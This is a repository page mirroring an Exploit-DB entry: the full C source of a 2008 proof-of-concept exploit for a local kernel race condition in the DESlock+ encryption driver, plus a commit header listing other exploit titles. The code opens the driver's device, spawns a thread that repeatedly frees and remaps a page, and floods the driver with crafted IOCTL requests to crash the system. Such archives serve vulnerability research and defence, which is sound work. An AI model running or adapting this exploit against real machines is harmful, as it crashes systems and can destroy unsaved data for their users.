bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/6497.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

139 lines
3.8 KiB
C
Executable file
Raw Blame History

/* deslock-probe-race.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* DESlock+ <= 3.2.7 local kernel race condition DoS POC
* by mu-b - Fri 22 Feb 2008
*
* - Tested on: DLMFENC.sys 1.0.0.28
*
* race conditions between calls to ProbeForRead/ProbeForWrite
* and pointer use.
*
* "Note that subsequent accesses by the driver to the user-mode
* buffer must also be encapsulated within a try/except block;"
* - http://msdn.microsoft.com/en-us/library/ms797108.aspx
*
* http://www.cctmark.gov.uk/CCTMAwards/DataEncryptionSystemsLtd/tabid/103/Default.aspx
* - I wonder what that says about CESG CCTM?
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define DLMFENC_IOCTL 0x0FA4204C
#define DLMFENC_FLAG 0xDEADBEEF
#define ARG_SIZE(a) ((a-(sizeof (int)*2))/sizeof (void *))
struct ioctl_req {
int flag;
int req_num;
void *arg[ARG_SIZE(0x20)];
};
void
hammer_thread (void *zpage)
{
BOOL result;
printf ("* [child] using page @0x%08X\n", zpage);
while (1)
{
result = VirtualFree (zpage, 0, MEM_RELEASE);
if (result == 0)
{
fprintf (stderr, "* [child] VirtualFree failed\n");
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc ((LPVOID) 0x41000000, 0x10000,
MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* [child] VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
}
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
HANDLE hFile, hThread;
DWORD rlen, dThread, nTotal, nFail;
LPVOID zpage;
BOOL result;
printf ("DESlock+ <= 3.2.7 local kernel race condition DoS PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
fflush (stdout);
hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc ((LPVOID) 0x41000000, 0x10000,
MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
hThread = CreateThread (NULL, 0, (LPTHREAD_START_ROUTINE) hammer_thread,
zpage, 0, &dThread);
if (hThread == NULL)
{
fprintf (stderr, "* CreateThread failed\n");
exit (EXIT_FAILURE);
}
nTotal = nFail = 0;
while (1)
{
memset (&req, 0, sizeof req);
req.flag = DLMFENC_FLAG;
req.req_num = 4;
req.arg[0] = (void *) zpage;
nTotal++;
result = DeviceIoControl (hFile, DLMFENC_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
if (!(nFail++ % 1024))
{
char *p_arr[] = { "DESLock", "ProbeForWrite", "a", "races",
"dull", "make", "boy" };
fprintf (stderr, "* total: %d [failed: %d, %f%%] [%13s]\r",
nTotal, nFail, (((double) nFail)/nTotal)*100, p_arr[nFail%7]);
fflush (stderr);
}
}
}
/* unreachable! */
printf ("* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
// milw0rm.com [2008-09-20]
Reference in a new issue View git blame Copy permalink